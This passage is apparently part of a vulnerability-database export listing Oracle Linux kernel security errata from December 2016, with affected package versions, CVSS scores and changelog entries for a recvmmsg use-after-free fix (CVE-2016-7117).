"packageName": "kernel-uek", "operator": "lt"}], "description": "kernel-uek\n[4.1.12-61.1.23]\n- net: Fix use after free in the recvmmsg exit path (Arnaldo Carvalho de Melo) [Orabug: 25298601] {CVE-2016-7117}", "edition": 3, "reporter": "Oracle", "published": "2016-12-21T00:00:00", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117"], "modified": "2016-12-21T00:00:00", "id": "ELSA-2016-3655", "href": "http://linux.oracle.com/errata/ELSA-2016-3655.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:44:26", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i686", "packageFilename": "kernel-xen-devel-2.6.18-417.el5.i686.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-417.el5PAE-2.0.5-2.el5.i686.rpm", "packageName": "oracleasm-2.6.18-417.el5PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.18-417.el5.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-417.el5-2.0.5-2.el5.i686.rpm", "packageName": "oracleasm-2.6.18-417.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i686", "packageFilename": "kernel-PAE-2.6.18-417.el5.i686.rpm", "packageName": "kernel-PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i686", "packageFilename": "kernel-2.6.18-417.el5.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i686", "packageFilename": "kernel-devel-2.6.18-417.el5.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-417.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-417.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-417.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "ia64", "packageFilename": "kernel-debug-devel-2.6.18-417.el5.ia64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-417.el5-2.0.5-2.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-417.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "x86_64", "packageFilename": "kernel-headers-2.6.18-417.el5.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-417.el5-2.0.5-2.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-417.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-417.el5-1.4.11-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-417.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-417.el5-1.4.11-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-417.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-417.el5-1.4.11-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-417.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.18-417.el5.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "x86_64", "packageFilename": "kernel-xen-devel-2.6.18-417.el5.x86_64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-417.el5xen-1.4.11-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-417.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "ia64", "packageFilename": "kernel-xen-devel-2.6.18-417.el5.ia64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "x86_64", "packageFilename": "kernel-xen-2.6.18-417.el5.x86_64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-417.el5debug-2.0.5-2.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-417.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-417.el5xen-1.4.11-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-417.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "ia64", "packageFilename": "kernel-devel-2.6.18-417.el5.ia64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i686", "packageFilename": "kernel-PAE-devel-2.6.18-417.el5.i686.rpm", "packageName": "kernel-PAE-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-417.el5debug-1.4.11-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-417.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "x86_64", "packageFilename": "kernel-2.6.18-417.el5.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i686", "packageFilename": "kernel-debug-2.6.18-417.el5.i686.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-417.el5xen-2.0.5-2.el5.i686.rpm", "packageName": "oracleasm-2.6.18-417.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i386", "packageFilename": "kernel-headers-2.6.18-417.el5.i386.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-417.el5debug-1.4.11-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-417.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-417.el5xen-2.0.5-2.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-417.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-417.el5-1.4.11-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-417.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "ia64", "packageFilename": "kernel-xen-2.6.18-417.el5.ia64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "ia64", "packageFilename": "kernel-headers-2.6.18-417.el5.ia64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-417.el5PAE-1.4.11-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-417.el5PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.18-417.el5.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "x86_64", "packageFilename": "kernel-devel-2.6.18-417.el5.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-417.el5debug-1.4.11-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-417.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-417.el5debug-2.0.5-2.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-417.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "ia64", "packageFilename": "kernel-2.6.18-417.el5.ia64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "i686", "packageFilename": "kernel-xen-2.6.18-417.el5.i686.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-417.el5xen-1.4.11-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-417.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-417.el5-1.4.11-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-417.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-417.el5-2.0.5-2.el5.src.rpm", "packageName": "oracleasm-2.6.18-417.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-417.el5-2.0.5-2.el5.src.rpm", "packageName": "oracleasm-2.6.18-417.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-417.el5-2.0.5-2.el5.src.rpm", "packageName": "oracleasm-2.6.18-417.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-417.el5xen-2.0.5-2.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-417.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-417.el5debug-2.0.5-2.el5.i686.rpm", "packageName": "oracleasm-2.6.18-417.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-417.el5-1.4.11-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-417.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "src", "packageFilename": "kernel-2.6.18-417.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "src", "packageFilename": "kernel-2.6.18-417.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "src", "packageFilename": "kernel-2.6.18-417.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.el5", "arch": "ia64", "packageFilename": "kernel-debug-2.6.18-417.el5.ia64.rpm", "packageName": "kernel-debug", "operator": "lt"}], "description": "kernel\n[2.6.18-417]\n- [virt] hv: do not lose pending heartbeat vmbus packets (Vitaly Kuznetsov) [1391167]\n- [net] Fix use after free in the recvmmsg exit path (Davide Caratti) [1390044] {CVE-2016-7117}", "edition": 3, "reporter": "Oracle", "published": "2016-12-20T00:00:00", "title": "kernel security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117"], "modified": "2016-12-20T00:00:00", "id": "ELSA-2016-2962", "href": "http://linux.oracle.com/errata/ELSA-2016-2962.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:40:39", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-417.0.0.0.1.el5xen-2.0.5-2.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-417.0.0.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.18-417.0.0.0.1.el5.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-xen-devel-2.6.18-417.0.0.0.1.el5.x86_64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "ia64", "packageFilename": "kernel-debug-devel-2.6.18-417.0.0.0.1.el5.ia64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-2.6.18-417.0.0.0.1.el5.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "ia64", "packageFilename": "kernel-debug-2.6.18-417.0.0.0.1.el5.ia64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-417.0.0.0.1.el5xen-2.0.5-2.el5.i686.rpm", "packageName": "oracleasm-2.6.18-417.0.0.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-devel-2.6.18-417.0.0.0.1.el5.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "ia64", "packageFilename": "kernel-xen-devel-2.6.18-417.0.0.0.1.el5.ia64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-417.0.0.0.1.el5debug-1.4.11-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-417.0.0.0.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-417.0.0.0.1.el5-2.0.5-2.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-417.0.0.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-417.0.0.0.1.el5PAE-1.4.11-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-417.0.0.0.1.el5PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-417.0.0.0.1.el5-2.0.5-2.el5.src.rpm", "packageName": "oracleasm-2.6.18-417.0.0.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-417.0.0.0.1.el5-2.0.5-2.el5.src.rpm", "packageName": "oracleasm-2.6.18-417.0.0.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-417.0.0.0.1.el5-2.0.5-2.el5.src.rpm", "packageName": "oracleasm-2.6.18-417.0.0.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-417.0.0.0.1.el5xen-1.4.11-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-417.0.0.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "i686", "packageFilename": "kernel-debug-2.6.18-417.0.0.0.1.el5.i686.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "ia64", "packageFilename": "kernel-xen-2.6.18-417.0.0.0.1.el5.ia64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "i686", "packageFilename": "kernel-xen-devel-2.6.18-417.0.0.0.1.el5.i686.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-417.0.0.0.1.el5-1.4.11-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-417.0.0.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "i686", "packageFilename": "kernel-devel-2.6.18-417.0.0.0.1.el5.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-417.0.0.0.1.el5-1.4.11-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-417.0.0.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-417.0.0.0.1.el5debug-1.4.11-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-417.0.0.0.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "ia64", "packageFilename": "kernel-devel-2.6.18-417.0.0.0.1.el5.ia64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "i686", "packageFilename": "kernel-PAE-2.6.18-417.0.0.0.1.el5.i686.rpm", "packageName": "kernel-PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-417.0.0.0.1.el5-2.0.5-2.el5.i686.rpm", "packageName": "oracleasm-2.6.18-417.0.0.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "ia64", "packageFilename": "kernel-2.6.18-417.0.0.0.1.el5.ia64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-417.0.0.0.1.el5xen-2.0.5-2.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-417.0.0.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.18-417.0.0.0.1.el5.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-417.0.0.0.1.el5PAE-2.0.5-2.el5.i686.rpm", "packageName": "oracleasm-2.6.18-417.0.0.0.1.el5PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-417.0.0.0.1.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-417.0.0.0.1.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-417.0.0.0.1.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-417.0.0.0.1.el5-1.4.11-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-417.0.0.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-417.0.0.0.1.el5-1.4.11-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-417.0.0.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-417.0.0.0.1.el5-1.4.11-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-417.0.0.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-417.0.0.0.1.el5-2.0.5-2.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-417.0.0.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "i686", "packageFilename": "kernel-xen-2.6.18-417.0.0.0.1.el5.i686.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "i386", "packageFilename": "kernel-headers-2.6.18-417.0.0.0.1.el5.i386.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-417.0.0.0.1.el5debug-2.0.5-2.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-417.0.0.0.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "src", "packageFilename": "kernel-2.6.18-417.0.0.0.1.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "src", "packageFilename": "kernel-2.6.18-417.0.0.0.1.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "src", "packageFilename": "kernel-2.6.18-417.0.0.0.1.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-headers-2.6.18-417.0.0.0.1.el5.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-417.0.0.0.1.el5debug-1.4.11-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-417.0.0.0.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-417.0.0.0.1.el5-1.4.11-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-417.0.0.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-417.0.0.0.1.el5xen-1.4.11-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-417.0.0.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.18-417.0.0.0.1.el5.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "ia64", "packageFilename": "kernel-headers-2.6.18-417.0.0.0.1.el5.ia64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "i686", "packageFilename": "kernel-PAE-devel-2.6.18-417.0.0.0.1.el5.i686.rpm", "packageName": "kernel-PAE-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.11-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-417.0.0.0.1.el5xen-1.4.11-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-417.0.0.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-417.0.0.0.1.el5debug-2.0.5-2.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-417.0.0.0.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-xen-2.6.18-417.0.0.0.1.el5.x86_64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-417.0.0.0.1.el5", "arch": "i686", "packageFilename": "kernel-2.6.18-417.0.0.0.1.el5.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-2.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-417.0.0.0.1.el5debug-2.0.5-2.el5.i686.rpm", "packageName": "oracleasm-2.6.18-417.0.0.0.1.el5debug", "operator": "lt"}], "description": "kernel\n- 2.6.18-417.0.0.0.1\n- [netfront] fix ring buffer index go back led vif stop [orabug 18272251]\n- [net] fix tcp_trim_head() (James Li) [orabug 14512145, 19219078]\n- ocfs2: dlm: fix recovery hung (Junxiao Bi) [orabug 13956772]\n- i386: fix MTRR code (Zhenzhong Duan) [orabug 15862649]\n- [oprofile] x86, mm: Add __get_user_pages_fast() [orabug 14277030]\n- [oprofile] export 